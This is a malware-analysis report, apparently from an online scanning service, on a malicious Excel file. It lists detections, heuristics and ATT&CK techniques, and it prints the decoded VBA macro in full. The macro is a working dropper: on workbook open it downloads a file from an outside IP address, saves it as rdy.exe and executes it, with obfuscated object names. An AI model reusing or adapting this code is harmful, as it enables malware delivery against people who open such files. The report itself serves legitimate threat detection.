MALICIOUS
310
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample is an Excel file containing VBA macros that are triggered by the Workbook_Open event. The macros utilize CreateObject and CallByName to download a file from a remote URL (http://169.239.129.61/k1) and execute it, as indicated by the 'OLE_VBA_HTTP_DROP_EXEC' and 'SC_STR_CMD' heuristic firings. The presence of the 'Xls.Malware.Sload-7057784-0' ClamAV detection further confirms its malicious nature.
Heuristics 9
-
ClamAV: Xls.Malware.Sload-7057784-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Sload-7057784-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
.write Form17.DisableV1.responseBody -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Form17.SubMainR1 = CreateObject(Form17.Label2.Tag) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName UserForm2, "Show", VbMethod -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub WorkBook_open() -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://169.239.129.61/k1� Referenced by macro
- http://t2.symcb.com0Referenced by macro
- http://tl.symcd.com0&Referenced by macro
- http://t1.symcb.com/ThawtePCA.crl0Referenced by macro
- http://tl.symcb.com/tl.crl0Referenced by macro
- https://www.thawte.com/cps0/Referenced by macro
- https://www.thawte.com/repository0WReferenced by macro
- http://tl.symcb.com/tl.crt0Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas🔏 SignedVBA project digital signature |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3102 bytes |
SHA-256: 478d1f8d6006c3d99af1af953a9515864df9e6f6b4577796a230e6d9d65fc317 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub WorkBook_open()
On Error Resume Next
CallByName UserForm2, "Show", VbMethod
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Anykey()
Dim time
time = Format(Now + TimeSerial(0, 1, 1), "hh:mm")
ExecuteExcel4Macro "MESSAGE(False, ""Debug"")"
#If RRRQUY2 Then
Dim BailoDHLAS5
Dim BailoDHLAS6
Dim BailoDHLAS7
Dim BailoDHLAS9
Dim BailoDHLAS8
Dim BailoDHLAS11
Dim BailoDHLAS12
#End If
#If Not RRRQUY2231 Then
Set Form17.SubMainR1 = CreateObject(Form17.Label2.Tag)
Set Form17.DisableV1 = CreateObject(Form17.Label1.Tag)
#End If
End Sub
Attribute VB_Name = "Form17"
Attribute VB_Base = "0{DC5218A9-CCA8-434A-A2AF-579F6CEEC007}{FB3527C3-7FCC-4397-AC05-8B24E566A281}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public SubMainR1 As Object
Public DisableV1 As Object
Public SubMainR2 As Object
Public DisableV2 As Object
Public SubMainR3 As Object
Public DisableV3 As Object
Public Sub Label5_Click()
Dim BailoDHLAS5
DisableV1.Open Me.Label3.Caption, Me.T10_Text.Tag, False
Dim BailoDHLAS6
End Sub
Public Sub S1000()
End Sub
Public Sub frfr4()
End Sub
Attribute VB_Name = "Modu"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub Attention()
Sheet1.Anykey
Dim BailoDHLAS4
Dim BailoDHLAS3
Form17.Label5_Click
Form17.DisableV1.Send
With Form17.SubMainR1
.Type = 1
End With
Form17.SubMainR1.Open
With Form17.SubMainR1
.write Form17.DisableV1.responseBody
End With
#If RRRQUY Then
Form17.SubMainR1.savetofile "rdy.e" & "xe", 2
#End If
ExecuteExcel4Macro Form17.T10_Text.Text
ExecuteExcel4Macro "MESSAGE(False, ""On2"")"
End Sub
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{0062A5F5-A213-45A9-AE2B-C9E67E660E46}{6E43B48E-F056-4E2E-B446-FB97ECF8CE45}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub FUnt()
Dim rd1 As New Modu
rd1.Attention
End Sub
Private Sub UserForm_Initialize()
FUnt
Unload Me
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.